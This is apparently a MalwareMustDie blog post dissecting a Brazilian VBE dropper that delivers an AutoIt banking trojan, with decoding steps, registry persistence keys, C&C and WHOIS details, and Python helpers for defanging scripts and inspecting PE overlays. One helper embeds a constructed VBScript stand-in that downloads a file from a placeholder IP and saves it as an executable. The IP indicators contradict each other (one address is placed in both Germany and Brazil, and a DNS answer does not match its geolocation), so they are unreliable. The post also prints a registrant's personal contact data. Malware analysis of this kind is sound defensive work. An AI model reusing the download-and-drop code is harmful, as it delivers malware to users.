MalwareMustDie (MMD) celebrates its third anniversary today, and I wrote this post for the occasion :) The point is to introduce a methodology for dissecting obfuscated script malware, using a real-life sample: a VBE-encoded script with multiple layers of obfuscation. I picked a VBE sample because of the recent rise in Visual Basic scripted malware, both as stand-alone VBE files and as macros attached to Microsoft Office documents, so hopefully this write-up shares some ideas with those who want to know more about how we dissect them in MMD. Another reason is to introduce a number of tools for practical malware analysis that anyone who wants to start learning can use. It's not that difficult, so let's learn it together!
A friend sent us a VB-encoded script (with thanks!); he has sent me a lot of good samples and I really appreciate it. The file is named "ContratoAssinar.vbe" (MD5 4bb9a041ab9cdd8398f95c0dd8a364b0), and I find it very interesting, so I thought I'd better make some notes here about the way I dissolved it, for others who may handle the same threat.
The threat originates from South America (Brazil, to be precise). The file appears to have arrived as an attachment in a malicious email campaign spreading this malware. The file name itself is quite well known; a bit of web searching will give you good information about this malware campaign.
VBE malware script
For this purpose I tend to use the script provided by the vendor, so I used this script-->[link] to decode it (the instructions are on that page and self-explanatory). Keep in mind that VBE is only an encoding (the Microsoft Script Encoder), not encryption: there is no key, so the original text is always recoverable. The result is another, partially obfuscated script; you can see the whole thing in the image below:
In the code above I have separated several areas by colour:
The yellow area is where the script makes sure it is executing under the right system command and path/file name; it starts in the first line with a Sub whose name is invoked in the last part of the overall script.
The red part is the data area where the actual malware commands for the next stage are stored in obfuscated form. Following the red arrow leads you to the blue area, the logic where that data is finally deobfuscated by the series of deobfuscation commands below it.
The orange part is where the deobfuscated commands are executed, and following the blue arrow leads you to the actual, mysterious malicious strings that the obfuscated script executes.
To understand the flow of obfuscation in the several programming languages I have faced so far in MalwareMustDie, whenever I deal with obfuscation I discipline myself to follow my own committed rules, shared below:
1. Simplify and beautify the code; make it easy to stare at (I mean, to read).
2. Break the code into pieces, comment them, and make sure you know how each component works.
3. Simulate the code securely in order to debug it. Use a compiler or interpreter if possible; if not, use your brain and take notes. At this stage, in heavily obfuscated challenges, I often have to go back to point 1 again, but so be it.
4. Do not get frustrated; enjoy the cracking. It will all be solved in time, believe it! When you are rushed or under pressure your brain cannot focus on the cracking, and if you push on regardless your work will not be effective and you will miss many things.
5. Write it down. Don't expect your brain to memorize every result you produce; make it searchable so you can use it for later reference.
In this case, the memo produced by applying the above rules and process to this sample can be seen in this pastebin--> [link]
Note: I tweaked some of the code so that you cannot run it in a harmful way if you just copy, paste and run it.
Below is the explanation of the paste and the next steps:
There are two environments that the gods of Windows provide us for dealing with Visual Basic scripting on any machine: wscript.exe and cscript.exe. I use wscript.exe only for checking breakpoints with the Wscript.Echo command, to inspect the value of a variable (under wscript.exe each Echo pops up a message box; under cscript.exe it is written to the console). In the paste you will see some simple breakpoints that check the vital values of the script, as seen in the screenshots below. Needless to say, any such run belongs in an isolated analysis VM, not on a production machine:
Once the breakpoint debugging has led you to the correct result and you want to copy the output into a text file, you can run the script with cscript.exe to get the text result on the console, as in the snapshot below:
The full code, beautified, is below:
We still have to deal with Visual Basic script, but now all of the code is readable. It obviously downloads a zip file from the internet, saves it to a certain folder, and extracts it into %appdata% plus a random folder name, as a random filename with an .exe extension. The script is neat: it has its own hand-written randomize functions and its own Subs for downloading the remote file from the hard-coded IP address 126.96.36.199 using the Microsoft.XMLHTTP and ADODB.Stream objects.
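The two habits described above (turning each Execute into a Wscript.Echo breakpoint and defanging the script before running it under cscript.exe, then pulling the download/drop indicators out of the decoded stage) can be automated. The following is an added example written for this post, not the MMD paste or the dropper's own code; the VBScript it operates on is a constructed stand-in that uses the same building blocks (WScript.Shell, %APPDATA%, Microsoft.XMLHTTP, ADODB.Stream, an Execute of a decoded blob) with the documentation address 192.0.2.10 in place of the real one.

```python
import re

# Constructed sample: a stripped-down stand-in for the decoded second stage
# described above, NOT the real ContratoAssinar.vbe code. 192.0.2.10 is a
# documentation-only address.
SAMPLE_VBS = r'''Dim ws, xh, st, dir
Set ws = CreateObject("WScript.Shell")
dir = ws.ExpandEnvironmentStrings("%APPDATA%") & "\" & RandName()
Set xh = CreateObject("Microsoft.XMLHTTP")
xh.Open "GET", "http://" & "192.0.2.10" & "/fake.zip", False
xh.Send
Set st = CreateObject("ADODB.Stream")
st.Type = 1 : st.Open : st.Write xh.responseBody
st.SaveToFile dir & "\" & RandName() & ".exe", 2
Execute Decode(payload)
ExecuteGlobal(stage2)'''

# Statements that hand a string to the interpreter. Rewriting them to
# WScript.Echo turns each one into a breakpoint that prints the next stage
# instead of running it (cscript.exe prints to the console, wscript.exe pops
# a message box). Eval is deliberately left alone: it is a function used
# inside expressions, so a blind swap would break the syntax.
DYNAMIC_EXEC_RE = re.compile(r'\b(ExecuteGlobal|Execute)\b', re.IGNORECASE)

# Member calls that reach the network, write to disk or spawn a process.
# Lines containing them are commented out so the instrumented script stays
# harmless even if a breakpoint is missed.
HARMFUL_CALL_RE = re.compile(
    r'\.(Send|SaveToFile|Run|Exec|ShellExecute|CopyFile|MoveFile)\b',
    re.IGNORECASE)

PROGID_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"', re.IGNORECASE)
ENV_VAR_RE = re.compile(r'%[A-Za-z_][A-Za-z0-9_]*%')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')


def instrument(script: str) -> str:
    """Return a copy of the script with Execute/ExecuteGlobal replaced by
    WScript.Echo and harmful member calls commented out with the VBScript
    comment marker. The result is meant to be run with cscript.exe so the
    decoded stage lands on the console."""
    echoed = DYNAMIC_EXEC_RE.sub('WScript.Echo', script)
    out = []
    for line in echoed.splitlines():
        if HARMFUL_CALL_RE.search(line):
            out.append("' DEFANGED: " + line)
        else:
            out.append(line)
    return '\n'.join(out)


def triage(script: str) -> dict:
    """Pull the indicators a first pass wants from a decoded stage: COM
    objects used, environment variables expanded, IPv4 literals, and how many
    dynamic-code statements will need breakpoints. Note that a URL built by
    string concatenation (as in the sample) defeats a naive URL regex, which
    is exactly why the breakpoint dump above is still needed."""
    return {
        'com_objects': sorted(set(PROGID_RE.findall(script))),
        'env_vars': sorted(set(ENV_VAR_RE.findall(script))),
        'ipv4': sorted(set(IPV4_RE.findall(script))),
        'dynamic_exec': len(DYNAMIC_EXEC_RE.findall(script)),
    }


if __name__ == '__main__':
    print(triage(SAMPLE_VBS))
    print(instrument(SAMPLE_VBS))
```

Against the constructed sample, triage() reports the three COM objects, %APPDATA%, the one IPv4 literal and two dynamic-execution statements, and instrument() yields a script in which both Execute calls print their argument and the Send/SaveToFile lines are commented out. The regexes are intentionally broad; the point is to find where to put breakpoints, not to replace reading the code.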
Note that our payload is a zip file containing a "text" file; it can be viewed on VirusTotal here-->[link] or in the picture below:
Isn't it amazing that in this era there are still crooks who expect victims to download 6 MB of malware without noticing? Well, here is one of them..
The IP that serves this malware is located in Germany:
"ip": "188.8.131.52", "hostname": "b9.globalplex.us", "city": null, "country": "DE", "loc": "51.0000,9.0000", "org": "AS12586 GHOSTnet GmbH"
The AutoIt PE "Banco" banking trojan
A quick check confirms the badness of this "text" file, which is actually a PE:
I have loved using pyew since the day we started MalwareMustDie, and thanks to Mr. Joxean Koret for developing it; I just want him to know that I have used it non-stop for three years :-) along with the many shell tools I use. It is VERY useful on UNIX shells where you cannot compile full binaries to run other binary-analysis tools, since it runs on Python. It also has many useful disassembler functions. Here's a snippet of the payload in this story:
To find the best way to proceed, static analysis is a must. pescanner provides many details for the reversing work that follows:
Just to make sure it's not a false detection, I tend to re-check with another beloved tool I use; you all know what it is:
For friends in a Windows OS environment, don't worry! PEStudio can statically analyze this malware very well; take a look at how many indicators were raised and at the detection of the AutoIt overlay below:
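The checks pyew, pescanner and PEStudio performed above (is this "text" file really a PE, and is there an AutoIt payload riding in the overlay after the last section?) reduce to a short walk of the PE headers. The following is an added example written for this post, not code from pyew, pescanner, PEStudio or the sample; it builds a minimal constructed PE image in memory (the real sample's layout and hashes are not on the page and are not reproduced) and looks for the "AU3!EA06" marker string that compiled AutoIt3 executables carry, which is the assumption the detection rests on.

```python
import struct

# Marker string carried by compiled AutoIt3 executables (assumption this
# check rests on; decompilers such as the one used above key on it too).
AUTOIT_MARKER = b'AU3!EA06'


def build_sample_pe(overlay: bytes) -> bytes:
    """Construct a minimal, non-runnable PE32 image with one section and the
    given bytes appended as overlay. Constructed test input, not a real sample."""
    e_lfanew = 0x40
    dos = b'MZ' + b'\0' * (0x3C - 2) + struct.pack('<I', e_lfanew)
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    opt_size = 0xE0
    file_hdr = struct.pack('<HHIIIHH', 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt_hdr = b'\x0b\x01' + b'\0' * (opt_size - 2)   # Magic = PE32, rest zeroed
    raw_ptr, raw_size = 0x200, 0x200
    # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData,
    # PointerToRawData, PointerToRelocations, PointerToLinenumbers,
    # NumberOfRelocations, NumberOfLinenumbers, Characteristics
    sect = struct.pack('<8sIIIIIIHHI', b'.text', raw_size, 0x1000, raw_size,
                       raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b'PE\0\0' + file_hdr + opt_hdr + sect).ljust(raw_ptr, b'\0')
    return headers + b'\xCC' * raw_size + overlay


def is_pe(data: bytes) -> bool:
    """True when the file has an MZ header and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b'PE\0\0'


def inspect_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> section table, compute where the
    last section's raw data ends, and treat everything past it as overlay."""
    if not is_pe(data):
        raise ValueError('not a PE file')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    fh_off = e_lfanew + 4
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from('<HHIIIHH', data, fh_off)
    sect_off = fh_off + 20 + opt_size
    sections, end_of_sections = [], 0
    for i in range(nsect):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            '<8sIIII', data, sect_off + i * 40)
        sections.append(name.rstrip(b'\0').decode('ascii', 'replace'))
        end_of_sections = max(end_of_sections, raw_ptr + raw_size)
    overlay = data[end_of_sections:]
    return {
        'machine': {0x14C: 'x86', 0x8664: 'x64'}.get(machine, hex(machine)),
        'sections': sections,
        'overlay_offset': end_of_sections,
        'overlay_size': len(overlay),
        'truncated': end_of_sections > len(data),
        'autoit_overlay': AUTOIT_MARKER in overlay,
    }


if __name__ == '__main__':
    sample = build_sample_pe(b'\0' * 16 + AUTOIT_MARKER + b'compiled script bytes')
    print(inspect_pe(sample))
```

On the constructed image the overlay starts at 0x400 (end of the single 0x200-byte section) and the AutoIt marker is found inside it; feed inspect_pe() the bytes of a real dropped file and the same fields tell you whether a decompiler is the right next step. An overlay without the marker is still worth a look: packers and other script-to-exe wrappers park their payload there as well.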
OK, time to reverse it. Since this is AutoIt malware, I prefer to decompile it for analysis. I use this good tool for it -->[link]
The result is as below; it brings us to "another level" of obfuscation :-)
You can see DLL structs scripted there for the malicious API calls, and some PE binary blobs (which are there to be used for x64 or x86 process injection). Please try to decode the AutoIt script yourself and trace its variables one by one. It's good to see readable code, isn't it?
Other activities that can be read plainly from this code are the sleep time taken after execution (see the beautified source code), VM detection (access to the VirtualBox device \\.\VBoxMiniRdrDN), and many more details, all performed from this AutoIt script through system calls.
Other important points of this malware infection are the registry autostart and an Explorer "file view" setting in the registry. EnableBalloonTips controls Explorer's tray balloon notifications; switching it off silences such pop-ups, and there is no good reason for a banking trojan to touch it.
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced EnableBalloonTips
I will add the malicious calls coded in the script one by one to this post later, as an addendum!
The malware contacts a remote C&C host in Brazil at IP 184.108.40.206, sending its C&C check-in data via an HTTP/1.1 POST; that IP has a very bad reputation-->[link]. Below is the evidence:
Lookup result for the domain contacted:
;; ANSWER SECTION:
hostbemore.com.            1800  IN  A   220.127.116.11
;; AUTHORITY SECTION:
hostbemore.com.            3600  IN  NS  ns1.dominios.uol.com.br.
hostbemore.com.            3600  IN  NS  ns2.dominios.uol.com.br.
hostbemore.com.            3600  IN  NS  ns3.dominios.uol.com.br.
;; ADDITIONAL SECTION:
ns1.dominios.uol.com.br.   3275  IN  A   18.104.22.168
ns2.dominios.uol.com.br.   3275  IN  A   22.214.171.124
ns3.dominios.uol.com.br.   3275  IN  A   126.96.36.199
IP address origin (GeoIP & ASN):
"ip": "188.8.131.52", "hostname": "No Hostname", "city": null, "country": "BR", "loc": "-23.5477,-46.6358", "org": "AS7162 Universo Online S.A."
The domain is registered through ENOM.COM with the contact email ARNALDOBALTAZAR@GMAIL.COM:
Domain Name: HOSTBEMORE.COM
Registry Domain ID: 1895096489_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2015-07-07T05:57:31.00Z
Creation Date: 2015-01-10T15:12:00.00Z
Registrar Registration Expiration Date: 2016-01-10T15:12:00.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Registry Registrant ID:
Registrant Name: "ARNALDO BALTAZAR NETO NETO"
Registrant Organization: "SOUZACRUZFERRAGISTA"
Registrant Street: "AV BELA VISTA2
Registrant City: "GOIANIA"
Registrant State/Province:
Registrant Postal Code: "74938110"
Registrant Country: "BR"
Registrant Phone: "+55.6198515323"
Registrant Email: "ARNALDOBALTAZAR@GMAIL.COM"
Sample for analysis and learning purposes: it's downloadable in 7zip format from here -->[link]
Kudos to the cool coders of the great tools & OS we use:
Happy anniversary to MMD friends! Stay safe! #MalwareMustDie!